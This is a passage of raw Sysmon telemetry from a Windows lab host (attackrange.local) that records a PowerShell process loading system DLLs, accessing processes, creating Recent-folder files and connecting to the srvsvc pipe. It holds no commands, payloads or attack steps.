17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530517Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530516Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+171086|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530515Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530514Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001530513Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFb314b51.TMPMD5=7EFF1DDF55D96F0016BF7AC05D7CA59D,SHA256=E8AA506D87C0E68F6486C75A720FB88EDAAEE9A75D326373BCDCB164E618A3A8falsefalse - insufficient disk space 11241100x80000000000000001530512Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFb314b51.TMP2021-04-21 17:30:15.670 734700x80000000000000001530511Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntmarta.dll10.0.14393.0 (rs1_release.160715-1616)Windows NT MARTA providerMicrosoft® Windows® Operating SystemMicrosoft Corporationntmarta.dllMD5=854A3CAE7C97B630158C9F7EE8555970,SHA256=20F0A4D99C5095A0CAC39B816BFC987F64CD051843C79E027714666375986176trueMicrosoft WindowsValid 254200x80000000000000001530510Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYK1OZAP5G4Y55D1150F.temp2021-04-19 12:25:37.5782021-04-21 17:30:15.670 11241100x80000000000000001530509Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYK1OZAP5G4Y55D1150F.temp2021-04-21 17:30:15.670 734700x80000000000000001530508Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001530507Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cscapi.dll10.0.14393.0 (rs1_release.160715-1616)Offline Files Win32 APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcscapi.dllMD5=6433F8201BFB449DC6B47F6999C2F164,SHA256=06729F1E0A0596620B48B6DC4A2CC9CC5FE55B17BD488C71F7F15AA4262C8C14trueMicrosoft WindowsValid 18141800x80000000000000001530506Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572\srvsvcC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 734700x80000000000000001530505Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x80000000000000001530504Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x80000000000000001530503Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntshrui.dll10.0.14393.4169 (rs1_release.210107-1130)Shell extensions for sharingMicrosoft® Windows® Operating SystemMicrosoft Corporationntshrui.dllMD5=E996A5D4EA7754FF1B0411F0B1664603,SHA256=B2DA0AC549C551A2CAF0714EF3B344C33943292FB1FA9F2EEFA706B6FF18F1A2trueMicrosoft WindowsValid 11241100x80000000000000001530502Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.667{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530501Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.666{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D79C7CD4F9B1A0C3042FB92ACC973DA9,SHA256=64FDA902DF673F0157C5387D76E9D7593F639B72EE81BD6F3133979582D8E5A2falsefalse - insufficient disk space 10341000x80000000000000001530500Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.648{21761711-83AD-607D-0C00-00000000BB01}7243060C:\Windows\system32\svchost.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530499Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.648{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\linkinfo.dll10.0.14393.0 (rs1_release.160715-1616)Windows Volume TrackingMicrosoft® Windows® Operating SystemMicrosoft CorporationLINKINFO.DLLMD5=4CE9B67A187310E37E535FC4165E0933,SHA256=469B33A5DDAA93D28F66AE6D6956268F6F2F09F146734D00A931FBDD1D87DE42trueMicrosoft WindowsValid 734700x80000000000000001530498Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.648{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\BCP47Langs.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)BCP47 Language ClassesMicrosoft® Windows® Operating SystemMicrosoft CorporationBCP47Lang.dllMD5=F688C2B9DD2EB56C3B0312B6380338AA,SHA256=B22DB210486D3B5F4EEB17900C5E7AA0EEFEDBB068A0C4858EFE9F8018C34628trueMicrosoft WindowsValid 734700x80000000000000001530497Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.648{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValid 734700x80000000000000001530496Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.648{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\userenv.dll10.0.14393.3986 (rs1_release.201002-1707)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=047D26DCED07A10913C3E7C3A7502BED,SHA256=143C661F79AC6BB271452A10C2A19F6B1AAAAE43B4062B6CFF173F7D8ABC40FEtrueMicrosoft WindowsValid 734700x80000000000000001530495Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.648{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x80000000000000001530494Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shell32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=E6D716FCDD7A5E7897267CDCED7D3EA3,SHA256=763990AA9286C3D945B6F0D617D3EB22CE88804AC3847F27A90509F813D77FD3trueMicrosoft WindowsValid 734700x80000000000000001530493Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x80000000000000001530492Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x80000000000000001530491Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x80000000000000001530490Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x80000000000000001530489Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\windows.storage.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=902EBA937960538CA5B7A586EAFE47EE,SHA256=0C5D100EFA1E51C36C0A6E4B35BFD09C3098616EE9B3E46DC49E9E1A8365A0DFtrueMicrosoft WindowsValid 734700x80000000000000001530488Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 10341000x80000000000000001530487Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-83AE-607D-1600-00000000BB01}11084896C:\Windows\system32\svchost.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530486Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-83AE-607D-1600-00000000BB01}11081152C:\Windows\system32\svchost.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530485Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x80000000000000001530484Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001530483Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x80000000000000001530482Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x80000000000000001530481Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001530480Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001530479Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001530478Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001530477Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001530476Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001530475Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001530474Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001530473Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft 